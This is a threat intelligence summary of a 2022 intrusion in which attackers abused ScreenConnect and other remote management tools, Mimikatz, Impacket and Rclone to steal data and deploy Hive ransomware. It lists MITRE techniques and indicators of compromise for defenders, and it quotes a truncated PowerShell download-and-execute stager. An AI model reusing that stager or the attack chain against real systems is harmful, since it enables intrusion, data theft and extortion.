Threat Research

From ScreenConnect to Hive Ransomware in 61 hours

TheDFIR

Multi-RMM intrusion in 2022 leveraged ScreenConnect to stage Hive ransomware, illustrating how adversaries abuse legitimate remote monitoring tools for initial access, C2, and lateral movement. The operation progressed through Cobalt Strike and Metasploit payloads, credential dumping, exfiltration via Rclone, and a domain-wide encryption attempt that ultimately encrypted key servers in 61 hours from initial access. Hashtags: #ScreenConnect #HiveRansomware

Keypoints

  • Adversaries used multiple remote monitoring & management (RMM) tools, including ScreenConnect, Atera, and Splashtop, as initial access and persistence mechanisms.
  • Initial access originated from a user-downloaded executable masquerading as a document, likely delivered via email with a link.
  • The intruders installed ScreenConnect, used BITS transfers and MSI/Rundll32 invocations, and conducted extensive internal discovery via standard Windows utilities.
  • Lateral movement employed Impacket wmiexec.py, quser checks, RDP, and remote PowerShell/MSI installations (Atera/Splashtop).
  • Credential dumping occurred with a Mimikatz variant (m2.exe), including LSASS access and password extraction.
  • Exfiltration used Rclone over SFTP to a remote host, with netscan and manual hands-on-keyboard activity observed.
  • The Hive ransomware was deployed after exfiltration, with domain-wide attempts via a misconfigured GPO/scheduled task that failed to encrypt domain-joined hosts at scale.

MITRE Techniques

  • [T1566.002] Phishing – Delivery via phishing email with a link that caused the executable’s download when clicked on. ‘The campaign was likely delivered via an email, with a link, causing the executable’s download when clicked on.’
  • [T1059.001] PowerShell – Use of PowerShell stagers and commands to download and execute payloads. ‘powershell.exe -nop -c “start-job { param($a) Import-Module BitsTransfer; … }’ and similar commands were observed.
  • [T1059.003] Windows Command Shell – Command execution via command interpreter; MSI/Rundll32 usage observed during installation and execution. ‘command execution is performed by dropping the desired script on disc, followed by its execution through the appropriate interpreter (Command Prompt or PowerShell).’
  • [T1543.003] Windows Service – Persistence via auto-start service (ScreenConnect/Atera). ‘ScreenConnect persistence as well as related command & control mechanisms are discussed in later sections.’
  • [T1053.005] Scheduled Task – Domain-wide ransomware deployment via a new GPO with a scheduled task (though failed domain-wide encryption). ‘created a new domain-wide GPO with a scheduled task intended to run the ransomware binary on each domain-joined host.’
  • [T1021.001] Remote Services – Lateral movement using remote services to execute PowerShell and MSI installers (Atera/Splashtop) on a server. ‘moved to lateral movement using remote services to execute PowerShell and MSI installers for Atera and Splashtop on a server.’
  • [T1047] Windows Management Instrumentation – Lateral movement via Impacket’s WMIEXEC class. ‘Impacket’s wmiexec.py script to perform their actions.’
  • [T1003.001] LSASS Memory – Credential dumping via Mimikatz. ‘the threat actor dropped the file m2.exe… mimikatz binary’ and ‘Mimikatz commands on execution.’
  • [T1021.002] SMB/Windows Admin Shares – Lateral movement and file transfers over SMB (remote services). ‘Remote Services… SMB file creation over SMB’ and 5145 events documented.
  • [T1041] Exfiltration – Data exfiltration over SFTP to an external host using Rclone. ‘exfiltrate the file share’s contents over the SFTP connection.’
  • [T1486] Data Encrypted for Impact – Hive ransomware encryption of key servers. ‘Once critical systems encrypted, the threat actor completed their impact with a final network share encryption.’
  • [T1490] Inhibit System Recovery – Shadow copy deletion and boot settings alteration to hinder recovery. ‘inhibits system recovery by deleting all shadow copies and altering boot settings.’

Indicators of Compromise

  • [IP] context – 31.41.244.192, 23.108.57.83, 94.232.43.201, and 190.2.146.96 (exfiltration target) outside the environment
  • [Domain] context – sodiwugoc[.]com, server-nixd7639ccc-relay.screenconnect[.]com, server-nixee656b9a-relay[.]screenconnect[.]com
  • [URL] context – https://environmentca[.]com/bkh6q
  • [File hash] context – ScreenConnect Installer/macros: 81997F4404FEBFB9C23F2F3939934513D499593750B4A4826C32878E05B83F30, D04E7E776EA28AF69381E346A1BF86BE5F5E4715003F7048783E7D1F049B1BD2
  • [File name] context – document8765.exe, setup.msi, m2.exe, netscan.exe

Read more: https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/